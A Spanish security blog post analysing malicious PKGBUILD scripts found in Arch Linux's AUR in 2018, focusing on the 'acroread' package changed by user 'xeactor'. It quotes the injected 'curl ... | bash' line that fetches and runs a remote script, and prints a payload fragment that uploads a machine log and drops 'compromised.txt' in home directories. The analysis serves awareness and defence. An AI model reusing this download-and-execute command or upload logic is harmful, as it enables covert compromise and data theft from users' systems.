CONVOCATORIA PARA CURSOS

 Programación de Cursos Segurmática para el 2019

Programación de Eventos y talleres Año 2019 Segurmática

Malware hallado en el repositorio AUR de Arch Linux

por

Se han hallado varios scripts maliciosos en el repositorio AUR de la distribución Arch Linux.

Arch Linux es una distribución Linux para, en general, usuarios avanzados, sin añadidos (bloatware) y con un modelo de publicación basado en “rolling release” (publicación continua de las versiones más recientes de los paquetes).

Debido a la celeridad en la producción y demanda de paquetes actualizados, la comunidad creó el sistema AUR (Arch User’s Repository) para que fuesen los propios usuarios los que subieran los scripts PKGBUILD. Estos scripts permiten adaptar la compilación e instalación de cualquier código fuente a Arch.

Los tres scripts hallados, con contenido malicioso, son (https://lists.archlinux.org/pipermail/aur-general/2018-July/034169.html)  :

acrored 9.5.5-8

balz 1.20-3

minergate 8.1-2

Centrándonos en el script (https://aur.archlinux.org/cgit/aur.git/commit/?h=acroread&id=b3fec9f2f16703c2dae9e793f75ad6e0d98509bc) correspondiente a ‘acroread’, vemos el contenido cambiado por el usuario denominado ‘xeactor’:

https://4.bp.blogspot.com/-GnIFj7S8qT8/W0XBopCY3xI/AAAAAAAABAg/jryUM2YGsMU-QKANYhDTDnDUlSOuHoqqgCLcBGAs/s1600/Captura%2Bde%2Bpantalla%2B2018-07-11%2Ba%2Blas%2B10.35.40.png

La línea “curl -s https://ptpb.pw/~x|bash -&” descarga un shell script con curl y seguidamente lo ejecuta. En el momento de escribir estas líneas aun estaba disponible en el servidor, el contenido (por si acaso) era el siguiente:

https://2.bp.blogspot.com/-M-Z1xn8AAO4/W0XCrMb9WhI/AAAAAAAABAo/CMyt4l9RbUc6AdlsOPnYcCeEIaxPIlIqwCLcBGAs/s1600/Captura%2Bde%2Bpantalla%2B2018-07-11%2Ba%2Blas%2B10.40.02.png

Instala un servicio que ejecuta cada cierto tiempo el script instalado en ‘/usr/lib/xeactor/u.sh’. Dicho script, a su vez, es descargado del mismo servidor (también disponible cuando esto fue escrito) desde ‘https://ptpb.pw/~u’ y contenía el siguiente código:

https://4.bp.blogspot.com/-LWVQ8FAHLpA/W0XDx-r2NQI/AAAAAAAABAw/Lft1eGKjYqET-P9LYOAnNhLs1uiLHZjmACLcBGAs/s1600/Captura%2Bde%2Bpantalla%2B2018-07-11%2Ba%2Blas%2B10.44.20.png

Básicamente, recolecta información de la máquina “infectada” y la envía a pastebin. En efecto, la parte que se ve en rojo es su propia clave privada de pastebin. De hecho ya hay gente que la habría usado para mofarse del creador de este “malware”:

https://3.bp.blogspot.com/-MEM3ljHPofk/W0XE5rVZZTI/AAAAAAAABA4/ueDz1WmU8TwOvsPBX-QyfgNDvTRuwM4gACLcBGAs/s1600/Captura%2Bde%2Bpantalla%2B2018-07-11%2Ba%2Blas%2B10.50.21.png

Otros usuarios han comentado (https://www.reddit.com/r/archlinux/comments/8x0p5z/reminder_to_always_read_your_pkgbuilds/)  en Reddit que “xeactor” podría estar preparando esta infección para minar, debido al historial de ese apodo relacionado con dicha tecnología:

https://1.bp.blogspot.com/-FhsAAAzhM2M/W0XFyn8B1_I/AAAAAAAABBA/Fw-5pJS9A58gmburhNw0AN9lpzK6CuWugCLcBGAs/s1600/Captura%2Bde%2Bpantalla%2B2018-07-11%2Ba%2Blas%2B10.54.05.png

Y en efecto, aunque es una afirmación atrevida, tirando de caché (https://webcache.googleusercontent.com/search?q=cache:n7om5R2PalIJ:https://aur.archlinux.org/pkgbase/minergate/%3Fcomments%3Dall+&cd=5&hl=es&ct=clnk≷=es&client=opera) de Google sí se observa dicha relación (reitero, esto no probaría que esa fuese su intención final, pero abre esa posibilidad):

https://1.bp.blogspot.com/-fPO-qbLIL94/W0XISbgdh5I/AAAAAAAABBU/BztHKlObQF0DNYsmCg6Iv1KhYyktAJXOQCLcBGAs/s1600/Captura%2Bde%2Bpantalla%2B2018-07-11%2Ba%2Blas%2B11.00.32.png

Respecto al sitio donde cuelgan los scripts, https://ptpb.pw/, es un gestor de “pastes”, del estilo del glorioso ‘pastebin’ y similares así como acortador de URLs, por lo que es posible que los scripts hayan sido, simplemente, subidos a esa plataforma sin relación alguna con el atacante. De hecho el método que habría usado es este en concreto:

https://1.bp.blogspot.com/-zhsLJRg-Zsc/W0XU3DysOgI/AAAAAAAABBg/y10MhsCJgkEmJCr7RIeZwtdZNsjNB54lQCLcBGAs/s1600/Captura%2Bde%2Bpantalla%2B2018-07-11%2Ba%2Blas%2B11.58.33.png

Vamos a comprobarlo:

https://4.bp.blogspot.com/-YAayWdc3OBg/W0XVKRzLx9I/AAAAAAAABBo/2w3rC_IldiQ-GUXRGzPvWHDOrK0qQlZwACLcBGAs/s1600/Captura%2Bde%2Bpantalla%2B2018-07-11%2Ba%2Blas%2B11.57.38.png

https://1.bp.blogspot.com/-Q8S9qztD_-k/W0XVe5m9VoI/AAAAAAAABBw/4P6YTH-FapY7gS902w8CbF-hf-vqWnNgwCLcBGAs/s1600/Captura%2Bde%2Bpantalla%2B2018-07-11%2Ba%2Blas%2B12.00.55.png

No sabremos las intenciones reales de tal usuario, porque el plan parecía de algún modo inacabado. No obstante, de haberlo llevado más lejos, nada le hubiera parado para instalar un minero u otro tipo de malware con mayor carga. Es más, incluso esta parte del código:

FULL_LOG=”$(full_log)”

$uploader “$FULL_LOG”

for x in /root /home/*; do

if [[ -w “$x/compromised.txt” ]]; then

echo “$FULL_LOG” > “$x/compromised.txt”

fi

done

exit 0

 

Deja un archivo con el contenido del log en los directorios /root y todos los /home de la máquina afectada, algo que resulta muy llamativo y evidente y que no dejaría pasar un usuario. Habitualmente, el malware dañino de cuida mucho de dejar esas pistas delante de la víctima, en este caso ni se ha encontrado una carga maliciosa ni oculta del todo sus operaciones. ¿Querría avisar ‘xeactor’ de la facilidad con la que se puede desatar una infección a los usuarios de Arch Linux? ¿O quizás eran sus intenciones más oscuras y esto solo era una prueba de concepto?

 

David García

@dgn1729 (https://twitter.com/dgn1729)

Más información:

Hilo de la conversación en la lista de ‘aur-general’:

https://lists.archlinux.org/pipermail/aur-general/2018-July/thread.html#34151

 

Hilo de Reddit Arch Linux:

https://www.reddit.com/r/archlinux/comments/8x0p5z/reminder_to_always_read_your_pkgbuilds/

 

Por noreply@blogger.com (David García)

 

Filed under Seguridad Informática by on #

Dejar un comentario

Fields marked by an asterisk (*) are required.

Imagen CAPTCHA
*

Video de la Semana

 

¿Cómo quitar contraseñas de documentos Word y comprimidos Winrar?